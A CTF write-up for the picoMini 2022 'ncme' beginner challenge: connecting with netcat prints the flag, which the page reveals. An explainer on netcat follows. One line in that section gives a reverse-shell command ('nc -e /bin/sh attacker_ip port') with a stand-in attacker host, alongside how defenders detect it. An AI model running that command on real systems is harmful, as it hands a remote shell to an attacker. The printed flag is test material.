ncme Beginner picoMini 2022 Solution

Published: April 2, 2026

Description

Connect to the server and get the flag.

Remote

Use netcat to connect to the provided host and port.

bash
nc saturn.picoctf.net <PORT>

Solution

Want to try it yourself first?

The guided walkthrough reveals hints one step at a time.

Walk me through it
New to networking tools? Networking Tools for CTF Challenges covers netcat (used here), curl, Wireshark, nmap, and browser DevTools.
  1. Step 1
    Connect with netcat
    Observation
    I noticed the challenge description said to connect to a server and provided a host and port, which indicated this was a raw TCP service and suggested using netcat, the standard tool for opening bare TCP connections without an application-layer protocol.
    Run the nc command with the host and port from the challenge page. The server immediately sends the flag without requiring any input.
    bash
    nc saturn.picoctf.net <PORT>

    Expected output

    picoCTF{s4n1ty_c4t}
    What didn't work first

    Tried: Trying to connect with curl instead of nc, e.g. curl saturn.picoctf.net:<PORT>

    curl speaks HTTP and immediately sends a GET request with protocol headers. The challenge server is a raw TCP service that does not speak HTTP, so curl either closes the connection immediately or hangs waiting for a valid HTTP response that never comes. nc makes no assumptions about the application protocol and simply forwards the raw byte stream, which is what the server expects.

    Tried: Omitting the port number and running nc saturn.picoctf.net without specifying <PORT>

    nc requires both a host and a port number to open a connection. Without the port it either prints a usage error or attempts to connect to port 0, which is reserved and will be refused. The correct command always includes the specific port shown on the challenge instance page.

    Learn more

    netcat (nc) is a command-line tool that establishes raw TCP or UDP connections. The basic syntax nc <host> <port> opens a connection to the specified host on the specified port, then passes data between your terminal's stdin/stdout and the network socket. It is the simplest way to interact with a service that speaks plain text.

    In CTF challenges, nc is used to connect to challenge servers that serve flags, run programs, or host interactive puzzles. The host is typically a domain name or IP address, and the port identifies which service on that host to connect to - similar to how a building address (host) and apartment number (port) together identify a specific destination.

    Common netcat use cases beyond CTFs include:

    • Testing whether a port is open: nc -zv host port
    • Listening for incoming connections: nc -l -p port
    • Transferring files between machines over a network
    • Debugging HTTP or SMTP servers by hand-crafting requests

    On some systems, netcat is installed as ncat (the Nmap version) or netcat. The flags differ slightly between implementations, but the basic connection syntax is the same.

    Under the hood, nc performs a standard TCP three-way handshake with the target host: it sends a SYN packet, waits for a SYN-ACK from the server, then completes the connection with an ACK. Once the connection is established, data flows as a raw byte stream - netcat makes no assumptions about the application-layer protocol. This is why it works equally well against HTTP servers, custom CTF services, or anything else that speaks TCP.

    In penetration testing, netcat is sometimes called the "TCP/IP Swiss Army knife" because of its versatility. Red teamers use it to set up reverse shells: a compromised machine runs nc -e /bin/sh attacker_ip port to send a shell back to the attacker's listener. Defenders detect this activity by monitoring for unexpected outbound connections or unusual use of the nc binary. Many modern Linux distributions ship without the -e flag specifically to limit this abuse vector.

    When a challenge server does not respond immediately after connecting, it is usually waiting for input. Common opening moves include pressing Enter, typing help, or sending a specific protocol keyword like GET / HTTP/1.0. Reading the challenge description carefully for hints about the expected protocol is always worthwhile before sending blind guesses.

    For challenges that require scripted interaction - sending inputs based on the server's responses - raw netcat quickly becomes insufficient. The pwntools Python library provides remote(host, port) to connect and methods like recvline(), sendline(), and interactive() to automate multi-step conversations with a server. Graduating from manual netcat to scripted pwntools is one of the key progressions in CTF skill development.

Flag

Reveal flag

picoCTF{s4n1ty_c4t}

netcat is the go-to tool for connecting to challenge servers that speak plain text - it opens a raw TCP connection and passes data between the terminal and the server.

Key takeaway

Netcat is a thin wrapper over TCP sockets that lets you speak any text-based protocol by hand. The same mental model, connecting to a host and port and exchanging raw bytes, applies when debugging HTTP servers, crafting custom protocol messages, or setting up reverse shells in penetration testing. Understanding ports as service identifiers and TCP as an ordered byte stream is foundational to almost every network-layer challenge and real-world network security task.

Related reading

Want more Beginner picoMini 2022 writeups?

Useful tools for General Skills

What to try next